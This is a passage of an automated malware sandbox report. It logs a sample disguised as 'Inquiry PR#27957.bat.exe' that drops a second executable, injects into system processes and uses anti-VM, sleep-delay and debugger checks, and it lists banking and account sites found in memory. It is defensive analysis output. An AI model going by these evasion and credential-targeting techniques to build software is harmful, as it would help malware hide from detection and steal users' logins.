            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: Inquiry PR#27957.bat.exe PID: 5748, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: fuqwoDzun.exe PID: 7596, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FF90818D944
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FF90818D504
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FF90818D544
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FF908190154
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeMemory allocated: 2F20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeMemory allocated: 8E10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeMemory allocated: 9E10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeMemory allocated: A010000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeMemory allocated: B010000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeMemory allocated: 930000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeMemory allocated: 2730000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeMemory allocated: 8480000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeMemory allocated: 6A60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeMemory allocated: 9480000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeMemory allocated: A480000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0166096E rdtsc 9_2_0166096E
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3186Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5521Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeWindow / User API: threadDelayed 9654
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.3 %
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe TID: 5980Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe TID: 6816Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe TID: 7600Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe TID: 7672Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exe TID: 8084Thread sleep count: 9654 > 30
            Source: C:\Windows\SysWOW64\sfc.exe TID: 8084Thread sleep time: -19308000s >= -30000s
            Source: C:\Windows\SysWOW64\sfc.exe TID: 8084Thread sleep count: 319 > 30
            Source: C:\Windows\SysWOW64\sfc.exe TID: 8084Thread sleep time: -638000s >= -30000s
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe TID: 8148Thread sleep time: -70000s >= -30000s
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe TID: 8148Thread sleep count: 36 > 30
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe TID: 8148Thread sleep time: -54000s >= -30000s
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe TID: 8148Thread sleep count: 35 > 30
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe TID: 8148Thread sleep time: -35000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\sfc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\sfc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 30-335c-.17.drBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: 30-335c-.17.drBinary or memory string: global block list test formVMware20,11696497155
            Source: 30-335c-.17.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: 30-335c-.17.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: 30-335c-.17.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: 30-335c-.17.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: 30-335c-.17.drBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO#l
            Source: 30-335c-.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: 30-335c-.17.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: 30-335c-.17.drBinary or memory string: bankofamerica.comVMware20,11696497155x
            Source: 30-335c-.17.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: 30-335c-.17.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: firefox.exe, 00000019.00000002.2099036367.00000121CCFCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ
            Source: 30-335c-.17.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: 30-335c-.17.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: 30-335c-.17.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: 30-335c-.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: 30-335c-.17.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: fuqwoDzun.exe, 0000000A.00000002.1474674839.00000000009D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: 30-335c-.17.drBinary or memory string: interactivebrokers.comVMware20,11696497155
            Source: 30-335c-.17.drBinary or memory string: AMC password management pageVMware20,11696497155
            Source: TsdBVAGjsKVoi.exe, 00000015.00000002.3787723829.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
            Source: 30-335c-.17.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: 30-335c-.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: 30-335c-.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: 30-335c-.17.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: 30-335c-.17.drBinary or memory string: discord.comVMware20,11696497155f
            Source: 30-335c-.17.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: 30-335c-.17.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: 30-335c-.17.drBinary or memory string: outlook.office365.comVMware20,11696497155t
            Source: 30-335c-.17.drBinary or memory string: outlook.office.comVMware20,11696497155s
            Source: 30-335c-.17.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: 30-335c-.17.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: 30-335c-.17.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\sfc.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0166096E rdtsc 9_2_0166096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00417913 LdrLoadDll,9_2_00417913
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F4164 mov eax, dword ptr fs:[00000030h]9_2_016F4164
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F4164 mov eax, dword ptr fs:[00000030h]9_2_016F4164
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B4144 mov eax, dword ptr fs:[00000030h]9_2_016B4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B4144 mov eax, dword ptr fs:[00000030h]9_2_016B4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B4144 mov ecx, dword ptr fs:[00000030h]9_2_016B4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B4144 mov eax, dword ptr fs:[00000030h]9_2_016B4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B4144 mov eax, dword ptr fs:[00000030h]9_2_016B4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B8158 mov eax, dword ptr fs:[00000030h]9_2_016B8158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01626154 mov eax, dword ptr fs:[00000030h]9_2_01626154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01626154 mov eax, dword ptr fs:[00000030h]9_2_01626154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161C156 mov eax, dword ptr fs:[00000030h]9_2_0161C156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01650124 mov eax, dword ptr fs:[00000030h]9_2_01650124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CE10E mov eax, dword ptr fs:[00000030h]9_2_016CE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CE10E mov ecx, dword ptr fs:[00000030h]9_2_016CE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CE10E mov eax, dword ptr fs:[00000030h]9_2_016CE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CE10E mov eax, dword ptr fs:[00000030h]9_2_016CE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CE10E mov ecx, dword ptr fs:[00000030h]9_2_016CE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CE10E mov eax, dword ptr fs:[00000030h]9_2_016CE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CE10E mov eax, dword ptr fs:[00000030h]9_2_016CE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CE10E mov ecx, dword ptr fs:[00000030h]9_2_016CE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CE10E mov eax, dword ptr fs:[00000030h]9_2_016CE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CE10E mov ecx, dword ptr fs:[00000030h]9_2_016CE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CA118 mov ecx, dword ptr fs:[00000030h]9_2_016CA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CA118 mov eax, dword ptr fs:[00000030h]9_2_016CA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CA118 mov eax, dword ptr fs:[00000030h]9_2_016CA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CA118 mov eax, dword ptr fs:[00000030h]9_2_016CA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E0115 mov eax, dword ptr fs:[00000030h]9_2_016E0115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F61E5 mov eax, dword ptr fs:[00000030h]9_2_016F61E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016501F8 mov eax, dword ptr fs:[00000030h]9_2_016501F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E61C3 mov eax, dword ptr fs:[00000030h]9_2_016E61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E61C3 mov eax, dword ptr fs:[00000030h]9_2_016E61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E1D0 mov eax, dword ptr fs:[00000030h]9_2_0169E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E1D0 mov eax, dword ptr fs:[00000030h]9_2_0169E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E1D0 mov ecx, dword ptr fs:[00000030h]9_2_0169E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E1D0 mov eax, dword ptr fs:[00000030h]9_2_0169E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E1D0 mov eax, dword ptr fs:[00000030h]9_2_0169E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01660185 mov eax, dword ptr fs:[00000030h]9_2_01660185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016DC188 mov eax, dword ptr fs:[00000030h]9_2_016DC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016DC188 mov eax, dword ptr fs:[00000030h]9_2_016DC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C4180 mov eax, dword ptr fs:[00000030h]9_2_016C4180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C4180 mov eax, dword ptr fs:[00000030h]9_2_016C4180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A019F mov eax, dword ptr fs:[00000030h]9_2_016A019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A019F mov eax, dword ptr fs:[00000030h]9_2_016A019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A019F mov eax, dword ptr fs:[00000030h]9_2_016A019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A019F mov eax, dword ptr fs:[00000030h]9_2_016A019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161A197 mov eax, dword ptr fs:[00000030h]9_2_0161A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161A197 mov eax, dword ptr fs:[00000030h]9_2_0161A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161A197 mov eax, dword ptr fs:[00000030h]9_2_0161A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164C073 mov eax, dword ptr fs:[00000030h]9_2_0164C073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01622050 mov eax, dword ptr fs:[00000030h]9_2_01622050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A6050 mov eax, dword ptr fs:[00000030h]9_2_016A6050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161A020 mov eax, dword ptr fs:[00000030h]9_2_0161A020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161C020 mov eax, dword ptr fs:[00000030h]9_2_0161C020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B6030 mov eax, dword ptr fs:[00000030h]9_2_016B6030
